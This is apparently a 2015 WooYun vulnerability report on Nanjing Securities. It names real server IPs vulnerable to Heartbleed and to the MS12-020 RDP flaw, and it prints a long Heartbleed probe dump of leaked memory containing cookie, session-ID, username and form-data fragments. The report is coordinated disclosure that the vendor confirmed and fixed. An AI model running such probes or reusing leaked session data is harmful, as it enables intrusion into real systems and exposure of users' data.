当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165210

漏洞标题:南京证券主站服务器心脏出血漏洞&分站服务器MS12-020RDP拒绝访问漏洞

相关厂商:南京证券

漏洞作者: 岛云首席鉴黄师

提交时间:2015-12-28 12:20

修复时间:2016-01-04 09:02

公开时间:2016-01-04 09:02

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-28: 细节已通知厂商并且等待厂商处理中
2015-12-29: 厂商已经确认,细节仅向厂商公开
2016-01-04: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

跪求20rank

详细说明:

主站服务器心脏出血漏洞:
https://221.231.143.159
www.njzq.com.cn

5.png


Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 1002
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  0100: 70 3D 31 A6 D2 BA 8A 93 AD CB 89 E7 BE 9C B7 CB  p=1.............
  0140: 59 61 63 87 CD 00 00 00 0F 00 01 01 00 00 0F 00  Yac.............
  0180: 00 38 00 0E 00 0D 00 19 00 1C 00 0B 00 0C 00 1B  .8..............
  01c0: 00 20 00 1E 06 01 06 02 06 03 05 01 05 02 05 03  . ..............
  0200: 4F 4E 5F 43 4F 4F 4B 49 45 3D 30 30 37 30 32 0D  ON_COOKIE=00702.
  0240: 8A 19 93 4B 0C 69 65 3A 20 4A 53 45 53 53 49 4F  ...K.ie: JSESSIO
  0280: 2E 65 33 34 4B 61 68 65 4D 61 78 75 52 63 34 30  .e34KaheMaxuRc40
  02c0: 65 26 75 73 65 72 4E 61 6D 65 3D 30 32 39 30 38  e&userName=02908
  0300: 31 31 B0 18 A9 39 49 8F 27 E3 7B 7E 52 A2 D7 C1  11...9I.'.{~R...
  0340: 64 61 74 61 3B 20 6E 61 6D 65 3D 22 73 75 62 74  data; name="subt
  0380: 65 32 30 36 33 38 0D 0A 43 6F 6E 74 65 6E 74 2D  e20638..Content-
  03c0: AE A1 E7 90 86 E6 80 BB E9 83 A8 0D 0A 2D 2D 2D  .............---
  0400: 2D 44 69 73 70 6F 73 69 74 69 6F 6E 3A 20 66 6F  -Disposition: fo
  0440: 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 37 64 66 32 33 32  ----------7df232
  0480: 61 74 4E 61 6D 65 53 74 72 22 0D 0A 0D 0A E7 A5  atNameStr"......
  04c0: 85 AC E5 91 8A 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D  .......---------
  0500: 73 69 74 69 6F 6E 3A 20 66 6F 72 6D 2D 64 61 74  sition: form-dat
  0540: 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 37 64 66 32  ------------7df2
  0580: 22 62 65 67 69 6E 5F 64 61 74 65 22 0D 0A 0D 0A  "begin_date"....
  05c0: 65 32 30 36 33 38 0D 0A 43 6F 6E 74 65 6E 74 2D  e20638..Content-
  0600: 31 32 2D 32 34 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D  12-24..---------
  0640: 73 69 74 69 6F 6E 3A 20 66 6F 72 6D 2D 64 61 74  sition: form-dat
  0680: 2D 2D 2D 37 64 66 32 33 32 31 65 32 30 36 33 38  ---7df2321e20638
  06c0: 0D 0A 0D 0A 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D  ......----------
  0700: 69 74 69 6F 6E 3A 20 66 6F 72 6D 2D 64 61 74 61  ition: form-data
  0740: 2D 2D 2D 2D 2D 2D 37 64 66 32 33 32 31 65 32 30  ------7df2321e20
  0780: 65 5F 64 61 74 65 22 0D 0A 0D 0A 32 30 31 35 2D  e_date"....2015-
  07c0: 38 0D 0A 43 6F 6E 74 65 6E 74 2D 44 69 73 70 6F  8..Content-Dispo
  0800: 2D 31 36 20 30 36 3A 34 37 3A 30 31 0D 0A 2D 2D  -16 06:47:01..--
  0840: 74 2D 44 69 73 70 6F 73 69 74 69 6F 6E 3A 20 66  t-Disposition: f
  0880: 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D  ----------------
  08c0: 61 3B 20 6E 61 6D 65 3D 22 62 6F 64 79 5F 66 69  a; name="body_fi
  0900: 74 2D 73 74 72 65 61 6D 0D 0A 0D 0A 0D 0A 2D 2D  t-stream......--
  0940: 74 2D 44 69 73 70 6F 73 69 74 69 6F 6E 3A 20 66  t-Disposition: f
  0980: 36 33 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D  63..------------
  09c0: 69 6F 6E 3A 20 66 6F 72 6D 2D 64 61 74 61 3B 20  ion: form-data;
  0a00: 66 32 33 32 31 65 32 30 36 33 38 0D 0A 43 6F 6E  f2321e20638..Con
  0a40: 63 68 6D 65 6E 74 22 3B 20 66 69 6C 65 6E 61 6D  chment"; filenam
  0a80: 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D  ..--------------
  0ac0: 6E 3A 20 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61  n: form-data; na
  0b00: 2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69  -Type: applicati
  0b40: 2D 2D 37 64 66 32 33 32 31 65 32 30 36 33 38 0D  --7df2321e20638.
  0b80: 61 74 74 61 63 68 6D 65 6E 74 5F 32 22 3B 20 66  attachment_2"; f
  0bc0: 61 6D 0D 0A 0D 0A 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D  am......--------
  0c00: 6F 73 69 74 69 6F 6E 3A 20 66 6F 72 6D 2D 64 61  osition: form-da
  0c40: 2D 2D 2D 2D 2D 2D 2D 2D 37 64 66 32 33 32 31 65  --------7df2321e
  0c80: 72 63 65 5F 74 79 70 65 22 0D 0A 0D 0A 30 0D 0A  rce_type"....0..
  0cc0: 65 6E 74 2D 44 69 73 70 6F 73 69 74 69 6F 6E 3A  ent-Disposition:
  0d00: 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 37  ---------------7
  0d40: 6D 65 3D 22 69 64 22 0D 0A 0D 0A 35 35 32 32 31  me="id"....55221
  0d80: 43 6F 6E 74 65 6E 74 2D 44 69 73 70 6F 73 69 74  Content-Disposit
  0dc0: 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D  ----------------
  0e00: 61 6D 65 3D 22 73 69 74 65 4E 61 6D 65 22 0D 0A  ame="siteName"..
  0e40: 33 38 0D 0A 43 6F 6E 74 65 6E 74 2D 44 69 73 70  38..Content-Disp
  0e80: 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D  ----------------
  0ec0: 6E 61 6D 65 3D 22 79 22 0D 0A 0D 0A 35 0D 0A 2D  name="y"....5..-
  0f00: 09 DB 22 CC AA F3 9B 15 5E 83 90 7B 72 18 0C 7A  ..".....^..{r..z
  0f40: 61 3B 20 6E 61 6D 65 3D 22 62 6F 64 79 22 0D 0A  a; name="body"..
  0f80: 6F 6E 74 65 6E 74 2D 44 69 73 70 6F 73 69 74 69  ontent-Dispositi
  0fc0: 61 6D 65 3D 22 22 0D 0A 43 6F 6E 74 65 6E 74 2D  ame=""..Content-
  1000: 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D  ----------------
  1040: 61 6D 65 3D 22 64 6F 63 75 6D 65 6E 74 5F 61 74  ame="document_at
  1080: 69 6F 6E 2F 6F 63 74 65 74 2D 73 74 72 65 61 6D  ion/octet-stream
  10c0: 0A 43 6F 6E 74 65 6E 74 2D 44 69 73 70 6F 73 69  .Content-Disposi
  1100: 69 6C 65 6E 61 6D 65 3D 22 22 0D 0A 43 6F 6E 74  ilename=""..Cont
  1140: 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D  ----------------
  1180: 61 3B 20 6E 61 6D 65 3D 22 65 64 69 74 6F 72 22  a; name="editor"
  11c0: 30 32 62 34 0D 0A 43 6F 6E 74 65 6E 74 2D 44 69  02b4..Content-Di
  1200: 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D  ----------------
  1240: 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22  orm-data; name="
  1280: 64 32 32 38 36 30 32 62 34 0D 0A 43 6F 6E 74 65  d228602b4..Conte
  12c0: 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D  ----------------
  1300: 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 73  rm-data; name="s
  1340: 32 38 36 30 32 62 34 0D 0A 43 6F 6E 74 65 6E 74  28602b4..Content
  1380: 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D  ----------------
  13c0: 74 61 3B 20 6E 61 6D 65 3D 22 79 22 0D 0A 0D 0A  ta; name="y"....
  1400: 0A 8C 1B 32 7A 09 98 4F 13 F9 2C 59 B8 19 9C F8  ...2z..O..,Y....
  1440: 30 20 30 20 35 30 30 20 35 30 30 20 30 20 35 30  0 0 500 500 0 50
  1480: 62 6A 0D 0A 3C 3C 2F 46 69 6C 74 65 72 2F 46 6C  bj..<</Filter/Fl
  14c0: 2F 06 93 98 2F 41 04 35 0A BD D8 0F B6 B3 3F C0  /.../A.5......?.
  1500: F1 19 A3 64 5E A6 FD 53 E9 7F BA 8E 5B 96 C7 E2  ...d^..S....[...
  1540: 99 DD 39 6E F4 7D DC 7E 8C 57 47 F2 54 F6 7A 98  ..9n.}.~.WG.T.z.
  1580: 10 97 0B 83 E5 A2 97 B4 86 DA 3E C9 F4 49 56 27  ..........>..IV'
  15c0: A0 B6 55 10 37 12 EA A4 84 A4 C4 AD E5 C0 71 6B  ..U.7.........qk
  1600: C6 0A 64 42 D1 16 1A 6C 0B E9 01 7D 29 59 87 BE  ..dB...l...})Y..
  1640: 73 74 72 65 61 6D 0D 0A 65 6E 64 6F 62 6A 0D 0A  stream..endobj..
  1680: 6E 67 74 68 31 20 34 38 37 37 31 36 3E 3E 0D 0A  ngth1 487716>>..
  16c0: 23 1B DB C8 0A 92 25 59 92 91 2C 21 4B C6 4E 42  #.....%Y..,!K.NB
  1700: CF 78 E4 08 F0 01 9E 19 CD F7 FB 79 33 5D DD 5D  .x.........y3].]
  1740: DA 7D 37 5F F3 5D F5 3D 43 39 A7 3F A6 94 3E BE  .}7_.].=C9.?..>.
  1780: B1 53 D7 FF FA C3 7F A3 F4 EB BF 23 E3 07 C7 0E  .S.........#....
  17c0: 75 C3 AB E5 FE 39 B9 DF 77 FC D4 B9 FB 3A A6 F5  u....9..w....:..
  1800: 2F FC 2B 65 FC E4 6F 29 65 DF 7E E6 F4 3D E7 66  /.+e..o)e.~..=.f
  1840: 77 29 E7 7D D5 BF 78 F2 89 57 67 37 7D 57 65 E2  w).}..x..Wg7}We.
  1880: 2A 35 AD 9C B9 57 8C AA 21 19 38 A4 6B C9 23 A6  *5...W..!.8.k.#.
  18c0: 6A CE C1 39 F5 48 BC 26 94 9E 9B A1 E9 B9 9F D5  j..9.H.&........
  1900: 8E B1 5E 89 88 88 88 96 4E 3F E8 FB C6 4B 71 4D  ..^.....N?...KqM
  1940: 88 7E 60 3A FE 73 84 88 16 20 F6 3D 22 22 22 22  .~`:.s... .=""""
  1980: 88 88 88 88 88 88 68 B1 C6 F7 66 22 22 22 22 22  ......h...f"""""
  19c0: FD 19 11 11 11 11 11 11 11 11 11 11 11 11 11 11  ................
  1a00: 22 22 A2 97 26 AD 54 FB 42 CF 03 11 11 11 11 11  ""..&.T.B.......
  1a40: D9 DB 4B 92 07 4D 2B F5 DC A7 31 76 F9 87 AF BD  ..K..M+...1v....
  1a80: 0F EC DE BB FB 1D BB FF E3 EE 8B 37 9E BC F1 9E  ...........7....
  1ac0: 23 EF 53 7B 31 AF 9F F9 CB A6 9F FD D0 D8 F3 D5  #.S{1...........
  1b00: 57 1B 8F FF DE CE C1 BD FA 31 3D F3 A6 B7 AB 8E  W........1=.....
  1b40: B3 2A BE AB E3 BB 2A BE AB 7B B7 EB 15 8D 94 9A  .*....*..{......
  1b80: 8C 8A FF 44 B4 76 65 CC FC AD 9C D8 C6 D5 7A F5  ...D.ve.......z.
  1bc0: 47 F2 0D EA 51 19 BB 55 ED 7E 34 FC A2 AD ED 8F  G...Q..U.~4.....
  1c00: 73 F4 C0 53 07 36 8C 1E F8 E4 81 CF 7F F2 80 1A  s..S.6..........
  1c40: EB A5 9D 60 52 E6 2E AF DE A9 5E A3 FE 48 05 AA  ...`R.....^..H..
  1c80: C9 79 83 5B F4 2A C3 36 1D 39 C3 0F 69 73 77 CA  .y.[.*.6.9..isw.
  1cc0: C7 73 27 EA 6F 89 DE 5A 7F 77 F4 EE FA A7 C3 CF  .s'.o..Z.w......
  1d00: 0A FA 07 EA 83 8E 9F 1F 95 35 B2 C7 7E B5 7D DA  .........5..~.}.
  1d40: F5 60 F5 4C D5 AE C6 AF CC 6B F7 83 9D 7D 5B 5B  .`.L.....k...}[[
  1d80: D6 4D 17 37 E5 F2 95 0D 7A F4 C0 6B BF 73 60 53  .M.7....z..k.s`S
  1dc0: BD A5 F9 0F AD 1D 58 A1 27 C6 2B E3 93 E3 A5 DE  ......X.'.+.....
  1e00: D8 59 F9 F8 BD 5F 7D 58 8E A4 11 F5 D0 54 FE 1D  .Y..._}X.....T..
  1e40: D3 A5 0F 94 57 FA 1F 91 CD 32 20 2B 2B FB EA 6E  ....W....2 ++..n
  1e80: 77 71 EB 53 F9 0D 1B B6 3E F5 B9 E6 8A 18 D1 F1  wq.S....>.......
  1ec0: C7 B6 32 B6 91 CA FD 84 EB B4 57 AA 95 30 EC EB  ..2.......W..0..
  1f00: 90 EA 95 15 D0 A7 0D 55 51 AD 32 D4 22 C7 78 F0  .......UQ.2.".x.
  1f40: 51 D6 DB 33 30 B9 76 20 5E 94 CB 6C 6B 59 D4 F1  Q..30.v ^..lkY..
  1f80: 6B F5 75 F5 87 72 9D 34 1C 5F ED 4D AE AD 57 9C  k.u..r.4._.M..W.
  1fc0: 55 F5 4E 37 EB DA A9 60 CD 26 3F 97 BB 71 28 DD  U.N7...`.&?..q(.
  2000: 7E 7F B5 3C DA 2D EB 3B 9C F9 9A FA A6 9C 91 DB  ~..<.-.;........
  2040: 4D 2F 2C EE 8C CA 07 CB 32 D5 78 89 D3 33 5F 51  M/,.....2.x..3_Q
  2080: FF AA FD 2E B3 EA 18 B9 FD F9 87 4F EA 82 59 8A  ...........O..Y.
  20c0: 75 8D 2C 5B B1 E2 C8 06 6D AE 56 99 8F 8A 23 87  u.,[....m.V...#.
  2100: 02 D7 48 95 AC B6 36 DF 32 57 9A 7E 7B 97 6E AD  ..H...6.2W.~{.n.
  2140: 76 D7 06 3B E5 F3 A8 67 45 C9 78 9D 63 B7 F7 15  v..;...gE.x.c...
  2180: 4F 3C FF 5B EF CD 94 CC FE 72 CE 35 0F B6 3A 19  O<.[.....r.5..:.
  21c0: 25 BB 6B 63 C6 F4 CB 53 2B E2 4F DA 50 F6 E5 EF  %.kc...S+.O.P...
  2200: 2A E3 7A 1B C7 F4 F8 4A 67 87 EC 5D C7 8C 8D F2  *.z....Jg..]....
  2240: CB 17 67 BE AA 3E AF 3E AD 72 B2 E7 B5 AB 95 B2  ..g..>.>.r......
  2280: EB DF 26 47 E4 B6 AC D6 D9 AB E5 C9 8F A7 03 FB  ..&G............
  22c0: 6F 42 26 5D 7F E6 2C D0 98 9F F8 B0 6B EE 9F 59  oB&]..,.....k..Y
  2300: F3 E6 CD 07 DB 8B 19 BB 2B 28 8C 65 4B A6 37 56  ........+(.eK.7V
  2340: B5 39 D0 5C 9B F1 81 F4 EC 85 48 7E DB C9 C1 24  .9.\......H~...$
  2380: E8 8A 6E 2D 87 6B 53 2D A1 BB 22 28 BC 7C 67 B6  ..n-.kS-.."(.|g.
  23c0: 9B 6B 66 DA 2A 4E E6 A0 E7 65 EC 63 F9 74 C6 B3  .kf.*N...e.c.t..
  2400: 5E 57 DD EB A3 F2 99 F4 C4 58 D6 E9 1E 4B 7B 57  ^W.......X...K{W
  2440: 8F A4 77 64 4B AF 94 AF 79 B9 CA C1 DC FA AE 9C  ..wdK...y.......
  2480: 34 BF 29 CB B5 4D BD 4C DD 2A D3 6D 9C 42 1A DB  4.)..M.L.*.m.B..
  24c0: FD 7E EE 65 8E 67 17 E5 2C E8 44 99 30 4A F7 76  .~.e.g..,.D.0J.v
  2500: 9D 29 7B 56 D0 91 35 5C 3F 6F 7B A9 62 3A 1B 7A  .){V..5\?o{.b:.z
  2540: 7E 26 5F 51 72 6C F8 72 CE F8 96 7A 5C D6 8D 23  ~&_Qrl.r...z\..#
  2580: BA FA C6 B7 EF 1B FE C5 5C 68 E8 EC 5B DD C8 D5  ........\h..[...
  25c0: EE EE E9 F6 F5 5B D6 97 DC B4 EF 74 64 52 99 95  .....[.....tdR..
  2600: 26 EF 9A BF 57 97 E3 AD 3C F0 CC EC 26 7B 5A 7C  &...W...<...&{Z|
  2640: 5C 7A 45 67 A5 F7 C3 5B E4 B2 45 87 FD A9 1E 27  \zEg...[..E....'
  2680: 1F C8 67 7C A7 AF 28 0B 2E 2B A0 6B A8 98 F2 33  ..g|..(..+.k...3
  26c0: F5 44 7C A6 B3 93 85 4D AE 1C BE E4 E5 2A 61 7F  .D|....M.....*a.
  2700: 4B D0 91 3A 9C 1A AD F8 91 B6 2C CF 6F 6D F7 AD  K..:......,.om..
  2740: 56 DF 96 25 8C F7 D5 D5 F3 F6 D4 E4 6C 2C 1F 64  V..%........l,.d
  2780: 2B EB F6 FB 7B 7B 87 BA BB 65 ED F7 6E F0 72 AF  +...{{...e..n.r.
  27c0: 29 53 EF D2 F1 86 B0 93 0F E1 2D F1 D9 64 FE E9  )S........-..d..
  2800: BD D5 35 3D 33 2C B6 B4 CB A7 F8 D0 6A A3 32 9E  ..5=3,......j.2.
  2840: C5 FF 3C AF 6C 06 A5 54 D1 73 E5 AB 58 DA CE E4  ..<.l..T.s..X...
  2880: 3A D2 9E 51 1C F1 33 DA F7 B2 46 CE F1 FC 54 6B  :..Q..3...F...Tk
  28c0: BB D5 ED EA 0E F9 74 9F DB 2B 9A 97 37 C5 8D 7A  ......t..+..7..z
  2900: 90 EF F8 13 E9 5D AE A5 53 8E 5D DA 55 AA B4 EB  .....]..S.].U...
  2940: B5 5D CE DB D9 F7 F4 F5 ED EB E9 31 6B 5E CA 6B  .].........1k^.k
  2980: CB D0 B9 FD 6E B6 E2 B6 45 EB C3 62 D8 96 4F BE  ....n...E..b..O.
  29c0: 9F CF CB 27 91 17 E9 5C 14 78 C1 26 D9 1D FC 74  ...'...\.x.&...t
  2a00: CE EB CD 30 EB EE CC 38 3D E3 61 CA 5D 73 A0 EC  ...0...8=.a.]s..
  2a40: 4D 3C D7 CD 9B F8 6E F3 D1 D9 7B B3 67 8D E6 75  M<....n...{.g..u
  2a80: 9B 7B B3 2C 61 FF 66 F9 D2 6B 65 9D BC 9C 8E 4D  .{.,a.f..ke....M
  2ac0: 56 FF 43 B5 CA 15 EA 06 B5 59 5D AD F6 CB B2 AC  V.C......Y].....
  2b00: 8D 06 83 76 A3 E2 18 51 5D BE 8B A5 75 50 CA 74  ...v...Q]...uP.t
  2b40: D1 70 47 6F CE CC AF EC CE 78 41 AA D7 1B 1E 68  .pGo.....xA....h
  2b80: A9 9E 91 B2 1C CB 25 F9 06 F1 94 EC AD 91 AA C9  ......%.........
  2bc0: 2D 66 65 A2 D3 B0 47 F4 87 A3 EB 73 65 23 2A DA  -fe...G....se#*.
  2c00: DA 2A 8F D4 75 CB 58 DE F6 07 56 BA BA B5 EF DF  .*..u.X...V.....
  2c40: 9E 9F 77 B6 6C 59 1B 38 5D 2D B9 94 99 2A 94 DB  ..w.lY.8]-...*..
  2c80: C9 AE F4 8C 98 C9 53 B3 FF A8 C3 79 CB E0 44 5A  ......S....y..DZ
  2cc0: 7A AF 9E 09 BD 87 D7 4B A6 D7 D6 E6 3B BD ED AD  z......K....;...
  2d00: 5B F2 9D E0 09 59 CE 29 B5 5D 5D 97 5C C7 C4 4B  [....Y.).]].\..K
  2d40: 8E AC 76 E2 2B B4 35 EB 82 FC CD 2F 8F 8A 9F 8E  ..v.+.5..../....
  2d80: B7 AF 6D 6D AD B5 B5 D5 5A 5B E3 2D D7 2E D7 07  ..mm....Z[.-....
  2dc0: D7 E4 95 A9 B0 35 17 85 C3 F9 7A 3A 74 AA 2B 9C  .....5....z:t.+.
  2e00: BE 31 F9 EB 46 F6 E7 CD 62 E9 C1 2D FF AE AD 64  .1..F...b..-...d
  2e40: F3 65 BA 4B C8 6B 01 E0 8A F4 C1 F9 AC 14 00 2C  .e.K.k.........,
  2e80: 01 00 C0 62 E2 E5 01 00 00 00 00 00 00 00 C0 65  ...b...........e
  2ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2f00: 94 BC 4A 5B 9E DC DB AD 4E 36 87 B5 8C FF F5 E6  ..J[....N6......
  2f40: 0C 6B 65 59 E7 9A C3 73 D3 95 61 73 DE E3 D6 BC  .keY...s..as....
  2f80: 76 5F 7B DB CB 6A 3B 4E 1E 3D 7C EE EC E9 BB 4F  v_{..j;N.=|....O
  2fc0: B5 D3 77 7E 9F 37 58 59 BB E6 E8 89 BB 4E DC 7D  ..w~.7XY.....N.}
  3000: C6 3C DC 7C E5 88 DC AE 51 63 62 B5 0A 54 7A FF  .<.|....Qcb..Tz.
  3040: B9 E7 DF 8E 19 6A 9F BC D7 29 F9 7D 5E DE F5 15  .....j...).}^...
  3080: 19 BA 46 9E 3D A1 EE 92 9F BB 65 BA B7 C9 E3 E7  ..F.=.....e.....
  30c0: 98 87 9B AF 39 DA BC 7F 28 79 A7 33 C9 B2 9D 92  ....9...(y.3....
  3100: 96 DF 97 5F 86 C6 FD 78 DC C3 32 B5 F3 C9 1A 3D  ..._...x..2....=
  3140: F6 8A CB 2D C1 EC D4 FF E5 7C 6D 9C B7 8D E2 25  ...-.....|m....%
  3180: FC AE 25 73 7B 6F 73 2B CF BE 4F 3C E6 49 19 E3  ..%s{os+..O<.I..
  31c0: 97 E2 9E FD 6F DD B3 EF 59 47 43 7C 34 1D 4F 9E  ....o...YGC|4.O.
  3200: E7 49 79 E4 C2 CC 9F 37 3E 82 66 66 B4 9E FB 34  .Iy....7>.ff...4
  3240: E5 98 AC D7 60 A1 E7 81 88 88 88 88 9E 5B 3F E8  ....`........[?.
  3280: FF D6 94 88 88 88 88 96 76 FC BF 43 B4 50 C9 BE  ........v..C.P..
  32c0: 85 9E 07 22 22 22 22 22 22 A2 C5 1A FF 5E 92 88  ...""""""....^..
  3300: 2F F4 3C 10 11 11 11 11 11 11 11 11 11 11 11 11  /.<.............
  3340: 56 AA B0 D0 F3 40 44 44 44 44 44 44 44 44 44 44  V....@DDDDDDDDDD
  3380: 7F 37 1E 4E 1E FB 5A 3C AC D4 AE 69 DF D7 72 FF  .7.N..Z<...i..r.
  33c0: C7 FF DD 23 F3 C7 0F 9E CE 26 E3 07 DF 89 87 93  ...#.....&......
  3400: C5 C3 C9 63 FF 37 1E 8E C7 CF E5 B4 B6 A6 77 4D  ...c.7........wM
  3440: E2 45 38 0F 00 58 44 1E 06 00 60 09 7A 04 00 00  .E8..XD...`.z...
  3480: 03 00 3C 07 BF 04 E0 8A F6 01 00 00 80 65 E9 09  ..<..........e..
  34c0: 6C 04 00 3C CB AD 78 11 CE 03 00 16 91 87 01 00  l..<..x.........
  3500: 00 00 00 00 00 00 97 71 1F 00 E0 39 F8 25 00 57  .......q...9.%.W
  3540: 00 00 96 B9 3A 96 8C EB C4 31 00 C0 B3 FC 02 5E  ....:....1.....^
  3580: B0 04 3D 02 00 00 00 00 00 00 00 00 80 CB 78 12  ..=...........x.
  35c0: EC 7D 79 F1 D3 36 00 00 58 E6 EA 58 32 AE 13 C7  .}y..6..X..X2...
  3600: 56 A7 01 00 00 70 05 7A 10 C0 12 B4 D0 7F 9B 2E  V....p.z........
  3640: 42 1E 06 80 2B D2 07 2F F1 67 00 B0 EC 5D 5C FC  B...+../.g...]\.
  3680: 0D 00 00 00 00 00 00 00 00 5C D6 EF 02 00 00 E0  .........\......
  36c0: 19 EE 5F 40 D7 3D 6F A7 96 90 87 01 E0 8A F4 C1  .._@.=o.........
  3700: C0 12 70 02 00 00 2C 2A 0B FD F7 29 03 00 00 00  ..p...,*...)....
  3740: 9B 94 A1 94 9F 51 69 DF 9C FE 69 35 A5 B6 8B 07  .....Qi...i5....
  3780: EA C9 DA 9E 4F 6C 9F 8A C5 F7 6E 9C 4E 9E CC A9  ....Ol....n.N...
  37c0: 69 9C 50 02 49 9D 68 2B 9C 44 D0 40 8E A2 34 81  i.P.I.h+.D.@..4.
  3800: FD CE 32 07 93 B2 68 72 6A F6 75 1B 09 A3 E4 2A  ..2...hrj.u....*
  3840: FE B0 73 94 17 F8 A5 5A DC 24 E8 39 7D CF 1B EF  ..s....Z.$.9}...
  3880: 2D 16 D5 39 DF 93 A0 55 91 05 8F 55 74 D2 69 A8  -..9...U...Ut.i.
  38c0: 29 D1 83 77 DD EF 1C E4 3F 03 CF ED 76 A1 BD DD  )..w....?...v...
  3900: 1D 17 3B C5 25 91 76 4C 7F 9E B5 17 C4 82 58 AE  ..;.%.vL......X.
  3940: 89 C4 EC 65 D3 F2 B2 D0 7E 7A 04 EF 1B D7 9A DD  ...e....~z......
  3980: 60 38 83 32 18 CE C6 33 08 CE 26 E3 87 C3 D9 F8  `8.2...3..&.....
  39c0: A0 0C 84 33 28 83 E0 9C 4A A2 44 0A 39 25 C4 51  ...3(...J.D.9%.Q
  3a00: 8C 2A CB 8B BC C8 F6 D2 8B 4E 81 FB 02 F7 7C CA  .*.......N....|.
  3a40: 02 57 B8 43 4B 26 02 BC 14 2A 39 73 C6 1B B8 02  .W.CK&...*9s....
  3a80: DD 04 CA F2 3D 62 44 7D 4A BC 2A 36 F1 B7 73 C3  ....=bD}J.*6..s.
  3ac0: 93 CE 0E 7E 95 E7 05 57 79 98 E6 7F 72 FD 51 01  ...~...Wy...r.Q.
  3b00: A4 4B 78 83 EF F2 08 4C F4 CE 7F CF F1 7B 9D 06  .Kx....L.....{..
  3b40: 8F 78 A6 8F 87 9D 79 AE E5 48 EE 0B E8 01 F7 30  .x....y..H.....0
  3b80: 1E EB 0F A9 04 68 F4 4F 62 86 DD F3 92 09 3C 96  .....h.Ob.....<.
  3bc0: 18 84 13 06 0C C2 09 03 06 E1 84 31 11 C2 08 73  ...........1...s
  3c00: C3 09 D3 2F 31 98 30 1A 6E A1 84 21 89 74 30 61  .../1.0.n..!.t0a
  3c40: A9 CB D1 40 7C F2 18 23 CA A8 45 2D D6 CC D0 BB  ...@|..#..E-....
  3c80: A5 CD 66 72 F6 70 1A 68 C4 DE 4F A3 12 CB F7 45  ..fr.p.h..O....E
  3cc0: 73 73 7F FC 5A 4C D1 8C 53 A8 E7 D6 26 7E D0 E4  ss..ZL..S...&~..
  3d00: 3A 1D A1 23 6C 84 1F 16 B3 E8 FE EE AC 38 CC 47  :..#l........8.G
  3d40: 48 95 FA 6D 84 8F 9D 97 A1 E3 DD F5 6C A6 F0 E9  H..m........l...
  3d80: 8D B9 16 B3 18 5B 67 CC BA DB DA C9 AA 1F 7F 08  .....[g.........
  3dc0: E4 E5 EA 62 F3 F9 61 F8 4B A0 3B 34 8B F2 9D D1  ...b..a.K.;4....
  3e00: CD 30 FF C4 06 1E BD 6E 3A 05 38 5C 73 5B EC 02  .0.....n:.8\s[..
  3e40: 49 2A 13 45 42 88 13 4D 42 30 8A 22 A1 89 13 45  I*.EB..MB0."...E
  3e80: 42 D3 A1 28 12 6A 24 46 90 50 9B 44 90 10 70 18  B..(.j$F.P.D..p.
  3ec0: 4A 3E 2D 0F C9 AF CB 6F C8 C3 72 3F FE 28 9E C0  J>-....o..r?.(..
  3f00: 5F 94 67 E5 39 F9 03 F9 43 F9 92 7C 59 FE 48 FE  _.g.9...C..|Y.H.
  3f40: EB A8 8B 7A 50 26 C6 04 6F EC 57 C5 F1 2F F1 25  ...zP&..o.W../.%
  3f80: 1D E4 4E B2 9D 4C 93 BB C8 03 E4 49 B2 8F EC 27  ..N..L.....I...'
  3fc0: 45 41 BD 19 D1 A2 09 09 09 09 09 09 09 09 09 09  EA..............


分站服务器MS12-020RDP拒绝访问漏洞:
rdp://202.102.79.198:4899
可以无限让服务器蓝屏,为了不影响业务,就不做演示了···

漏洞证明:

如上

修复方案:

打补丁……

版权声明:转载请注明来源 岛云首席鉴黄师@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-29 11:54

厂商回复:

漏洞已经确认,多谢提醒!

最新状态:

2016-01-04:漏洞已经修复!

漏洞评价:

评价

